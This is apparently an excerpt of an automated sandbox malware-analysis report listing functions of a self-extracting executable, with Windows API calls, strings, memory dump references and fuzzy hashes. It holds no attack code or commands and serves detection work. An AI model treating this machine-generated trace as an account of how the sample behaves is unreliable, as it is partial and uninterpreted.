API String ID: 359084233-0
Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
wsprintfW.USER32 ref: 004045BB
GetFileAttributesW.KERNELBASE(?), ref: 004045D6

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603

??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B

Strings

(nA, xrefs: 004126DD, 004126E0

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$ExceptionThrow
String ID: (nA
API String ID: 2803161813-867891557
Opcode ID: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
Opcode Fuzzy Hash: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58

Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040CBC4
_CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7

Strings

PlA, xrefs: 0040CBD6

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID: PlA
API String ID: 3773818493-1533977103
Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C

Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
String ID:
API String ID: 1642057587-0
Opcode ID: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
Opcode Fuzzy Hash: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98

Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002F,0000002F,?,00406616,?,00419810,00419810), ref: 00401739
??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

ExecuteFile, xrefs: 00401731

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@FileTime$??3@AttributesSystemlstrlen
String ID: ExecuteFile
API String ID: 1306139538-323923146
Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628

Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
Opcode Fuzzy Hash: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659

Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3

Strings

@, xrefs: 004026E6

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C

Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C828

Strings

lA, xrefs: 0040C7F2

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@
String ID: lA
API String ID: 613200358-262130271
Opcode ID: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
Opcode Fuzzy Hash: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED

Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041017F
??3@YAXPAX@Z.MSVCRT(?), ref: 00410274

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
Opcode Fuzzy Hash: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D

Function 00401172 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: f98f7cb9ec974a4530d0d7b56a79467f1bba101914a29fc132c294c06771da84
Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
Opcode Fuzzy Hash: f98f7cb9ec974a4530d0d7b56a79467f1bba101914a29fc132c294c06771da84
Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754

Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
Opcode Fuzzy Hash: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768

Function 004045F4 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNELBASE(?,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404630
??3@YAXPAX@Z.MSVCRT(?,?,?,00406260,?,00000000,0000000A), ref: 00404639

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@EnvironmentVariable
String ID:
API String ID: 3880889418-0
Opcode ID: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
Instruction ID: b821aa63e9602637d8feb686bb827f934507ba03fca214f0c99b91fc16a187d9
Opcode Fuzzy Hash: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
Instruction Fuzzy Hash: BDF05836900118AFCB01AF98EC458CE77B8EB48704B41807AE922A72A1DB34AD418B8D

Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
GetLastError.KERNEL32(?,?,?,?), ref: 0040C922

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64

Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4

Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041032E

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55

Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00401296

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59

Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99

Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54

Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406E18

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0

Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

